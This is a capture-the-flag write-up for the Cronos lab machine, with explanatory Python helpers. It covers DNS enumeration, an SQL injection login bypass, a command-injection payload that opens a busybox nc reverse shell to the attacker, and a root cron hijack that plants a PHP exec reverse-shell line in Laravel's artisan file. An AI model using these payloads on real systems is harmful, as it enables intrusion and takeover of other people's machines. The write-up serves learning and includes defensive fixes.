0x00 Recon

╰─ sudo rustscan -a 10.10.10.13  --ulimit 10000  -- -sC -sS -sV -A  
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.10.13:22
Open 10.10.10.13:53
Open 10.10.10.13:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-21 09:11 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
Initiating Ping Scan at 09:12
Scanning 10.10.10.13 [4 ports]
Completed Ping Scan at 09:12, 0.22s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:12
Scanning ns1.cronos.htb (10.10.10.13) [3 ports]
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 80/tcp on 10.10.10.13
Discovered open port 22/tcp on 10.10.10.13
Completed SYN Stealth Scan at 09:12, 0.22s elapsed (3 total ports)
Initiating Service scan at 09:12
Scanning 3 services on ns1.cronos.htb (10.10.10.13)
Completed Service scan at 09:12, 11.56s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ns1.cronos.htb (10.10.10.13)
Retrying OS detection (try #2) against ns1.cronos.htb (10.10.10.13)
Initiating Traceroute at 09:12
Completed Traceroute at 09:12, 0.18s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:12
Completed Parallel DNS resolution of 1 host. at 09:12, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.10.13.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 8.90s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.73s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:12
Completed NSE at 09:12, 0.00s elapsed
Nmap scan report for ns1.cronos.htb (10.10.10.13)
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2024-04-21 09:12:00 EDT for 27s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ=
| 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx
53/tcp open domain syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

Besides the usual http on 80 and ssh on 22, this box also exposes dns on 53.
Port 53 is the odd one out, so let's use nslookup against the target's own resolver and ask it about its IP (a reverse lookup).
Reference for the process: https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

nslookup
> SERVER 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb

That gives us a domain name: cronos.htb.
Next, point dig at the same server and see whether it coughs up any other hostnames under that domain.

╰─ dig any cronos.htb @10.10.10.13

; <<>> DiG 9.19.21-1-Debian <<>> any cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38142
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb. IN ANY

;; ANSWER SECTION:
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb. 604800 IN A 10.10.10.13

;; Query time: 188 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sun Apr 21 09:29:52 EDT 2024
;; MSG SIZE rcvd: 131

That hands us a new name, admin.cronos.htb. Note that the admin.cronos.htb in the SOA record is the RNAME field, i.e. the zone contact's mailbox admin@cronos.htb written as a domain name, not a subdomain record; listing real subdomains would take a zone transfer (dig axfr cronos.htb @10.10.10.13) or a wordlist brute force. Still, it is a strong hint that an admin virtual host exists, and it does.
Map cronos.htb, ns1.cronos.htb and admin.cronos.htb to 10.10.10.13 in /etc/hosts and the sites load normally.
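As an added example (my own helper, not part of the original writeup): a small Python script that parses the dig answer above (copied inline as constructed input), names the seven SOA fields so the RNAME-is-a-mailbox point is explicit, and builds the /etc/hosts line. Treating the SOA contact's local part as a vhost guess is my heuristic, not something the DNS data proves.

```python
import re

# The ANSWER/ADDITIONAL records from the dig output above, copied inline so this runs offline.
DIG_ANY_ANSWER = """\
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
"""


def reverse_name(ip):
    """IPv4 -> in-addr.arpa owner name, i.e. the name nslookup queried for the PTR above."""
    octets = ip.split(".")
    if len(octets) != 4:
        raise ValueError("IPv4 dotted quad expected")
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def parse_dig_answer(text):
    """'owner ttl IN type rdata...' lines -> list of (owner, type, rdata fields)."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 5 and parts[2] == "IN":
            records.append((parts[0].rstrip("."), parts[3], parts[4:]))
    return records


def soa_contact(rname):
    """RNAME is a mailbox: first label is the local part (an escaped dot stays a dot), the rest the domain."""
    labels = re.split(r"(?<!\\)\.", rname.rstrip("."))
    return labels[0].replace("\\.", ".") + "@" + ".".join(labels[1:])


def soa_fields(rdata):
    """Name the seven SOA fields instead of reading them positionally."""
    mname, rname, serial, refresh, retry, expire, minimum = rdata
    return {"primary": mname.rstrip("."), "contact": soa_contact(rname), "serial": int(serial),
            "refresh": int(refresh), "retry": int(retry), "expire": int(expire),
            "minimum": int(minimum)}


def hostnames(records):
    """Names that really exist in the answer: record owners and NS targets."""
    names = set()
    for owner, rtype, rdata in records:
        names.add(owner)
        if rtype == "NS":
            names.add(rdata[0].rstrip("."))
    return sorted(names)


def vhost_candidates(records):
    """Real names plus one guess: the SOA contact's local part as a label under the zone (heuristic)."""
    names = set(hostnames(records))
    for _owner, rtype, rdata in records:
        if rtype == "SOA":
            local, domain = soa_contact(rdata[1]).split("@")
            names.add(local + "." + domain)
    return sorted(names)


def hosts_line(ip, names):
    """One /etc/hosts line mapping every candidate to the target."""
    return ip + " " + " ".join(names)


if __name__ == "__main__":
    recs = parse_dig_answer(DIG_ANY_ANSWER)
    print(reverse_name("10.10.10.13"))
    print(soa_fields(recs[0][2]))
    print(hosts_line("10.10.10.13", vhost_candidates(recs)))
```

The guessed name still has to be confirmed by actually requesting it (a different response for Host: admin.cronos.htb than for the default site); an AXFR or brute force is the proper way to enumerate, the guess is just cheap.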

0x01 SQLI to Login

Browsing to admin.cronos.htb shows a bare-bones login page.

From the HTML and the requests it is clearly not an off-the-shelf CMS but a hand-rolled login page, which means no public exploit to look up: we have to find the hole ourselves.

In the end a classic universal password dropped us straight in, lol.

username: admin' or 1 = 1 -- -
password: admin' or 1 = 1 -- -
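To show why that payload works, here is an added example (mine, not the Cronos application's code, whose schema is not shown in the writeup): a constructed SQLite users table, a login function that concatenates the input into the query the way the vulnerable page evidently does, and the parameterised version beside it.

```python
import hashlib
import sqlite3


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """Constructed demo table with a single admin user; the password here is made up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", sha256("not-the-real-password")))
    return db


def vulnerable_query(username, pw_hash):
    """The classic mistake: user input concatenated into the SQL text."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + pw_hash + "'")


def login_vulnerable(db, username, password):
    """Returns the matched username, or None. Hashing the password does nothing against SQLi."""
    row = db.execute(vulnerable_query(username, sha256(password))).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Bound parameters: the driver sends values separately, so they can never become SQL."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, sha256(password))).fetchone()
    return row[0] if row else None


# The writeup's payload. The trailing "-" matters on MySQL, where "--" only opens a comment
# when followed by whitespace; SQLite accepts a bare "--" but the habit costs nothing.
PAYLOAD = "admin' or 1 = 1 -- -"


def demo():
    db = make_db()
    return {
        "query_seen_by_db": vulnerable_query(PAYLOAD, sha256(PAYLOAD)),
        "vuln_username_field": login_vulnerable(db, PAYLOAD, PAYLOAD),
        "vuln_password_field_only": login_vulnerable(db, "admin", PAYLOAD),
        "safe_with_payload": login_safe(db, PAYLOAD, PAYLOAD),
        "safe_real_creds": login_safe(db, "admin", "not-the-real-password"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The query the database actually sees ends in `... username = 'admin' or 1 = 1 -- -' AND password = '...'`: everything after `--` is a comment, so the password check disappears and the OR makes every row match. In this demo the password field's copy of the payload is inert because it is hashed before it reaches SQL; it is the username field that lets us in.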

0x02 Command Injection

After logging in we land on this page.

It screams command injection (user input handed straight to a system command), so let's throw a payload at it right away.

ping ;busybox nc 10.10.xxx.xxx 1111 -e /bin/bash

With a listener waiting on our side (nc -lvnp 1111), that gives us a reverse shell.

0x03 Privilege Escalation

Once in, we're only www-data.
Basic checks turn up nothing usable, so we run linpeas to gather information.

* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

This cron job stands out: every minute, root runs php on /var/www/laravel/artisan. The file sits under /var/www/, which www-data can write to, so we can swap it out.
First copy /var/www/laravel/artisan off the box and add a reverse-shell payload at the very top:

<?php
exec('busybox nc 10.10.xxx.xxx 8888 -e /bin/bash');
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
...

Then overwrite /var/www/laravel/artisan with the modified file, start a listener on 8888 and wait for root's cron to execute our payload (exec() blocks until the nc session ends, so that minute's scheduler run simply hangs on our shell, which is harmless here).
That gives us root, and root.txt is in /root:

root@cronos:~# cat root*
cat root*
9fxxxxxxxxxxxxxxxxxxxxxxxxxxxx
root@cronos:/home/noulis# cat user*
cat user*
78xxxxxxxxxxxxxxxxxxxxxxxxxxxx
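The cron weakness that gave us root can be checked mechanically, both while enumerating a target and when auditing your own servers. Added example (my own code, not from the writeup or linpeas): parse /etc/crontab-style lines, pull out the absolute paths each root job touches, and flag the ones the low-privilege user could rewrite. The crontab text below is constructed from the line linpeas showed plus a stock Ubuntu line; the ownership table standing in for stat() assumes the laravel tree belongs to www-data (uid 33), which is my assumption.

```python
import os
import re
import stat
import tempfile

# Constructed: the line linpeas reported, a stock Ubuntu line for contrast, and a variable line.
CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
"""

# Stand-in for stat() so the check runs offline: path -> (owner uid, permission bits).
# 33 is www-data on Ubuntu; that artisan is owned by www-data is an assumption.
FAKE_FS = {
    "/var/www/laravel/artisan": (33, 0o644),
    "/etc/cron.hourly": (0, 0o755),
}

CRON_RE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.*?)\s*$")


def parse_system_crontab(text):
    """(schedule, user, command) for /etc/crontab-style lines; skips comments and VAR=value."""
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append(m.groups())
    return jobs


def script_paths(command):
    """Absolute paths named in the command, ignoring '/' and device/pseudo files used for redirection."""
    tokens = re.split(r"[\s;&|]+", command)
    return [t for t in tokens
            if t.startswith("/") and len(t) > 1 and not t.startswith(("/dev/", "/proc/"))]


def stat_file_info(paths):
    """Real filesystem lookup in the same shape as FAKE_FS; regular files only."""
    info = {}
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode):
            info[p] = (st.st_uid, stat.S_IMODE(st.st_mode))
    return info


def hijackable(jobs, file_info, attacker_uid=33):
    """Root-run jobs whose file the attacker can rewrite: owned by them, or group/other-writable.
    Group-writable is treated as writable without checking membership, so it can over-report."""
    findings = []
    for _schedule, user, command in jobs:
        if user != "root":
            continue
        for path in script_paths(command):
            if path in file_info:
                owner, mode = file_info[path]
                if owner == attacker_uid or mode & 0o022:
                    findings.append((path, command))
    return findings


def demo():
    """Audit the constructed crontab, then a real world-writable temp file to exercise os.stat()."""
    constructed = hijackable(parse_system_crontab(CRONTAB), FAKE_FS)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "artisan")
        open(path, "w").close()
        os.chmod(path, 0o666)  # deliberately world-writable
        jobs = parse_system_crontab("* * * * * root php " + path + " schedule:run\n")
        live = hijackable(jobs, stat_file_info(script_paths(jobs[0][2])), attacker_uid=-1)
    return {"constructed": constructed, "tempfile_flagged": len(live) == 1}


if __name__ == "__main__":  # live use on a box: audit /etc/crontab as the current user
    jobs = parse_system_crontab(open("/etc/crontab").read())
    paths = [p for _, _, cmd in jobs for p in script_paths(cmd)]
    for path, command in hijackable(jobs, stat_file_info(paths), attacker_uid=os.getuid()):
        print("root runs a file you can write:", path, "<-", command)
```

The fix on the defending side is the mirror image of the check: anything root executes from cron must be owned by root and not writable by group or other, and that applies to the whole chain (the interpreter, the script, and any directory a relative require() is resolved from), not just the first path on the line.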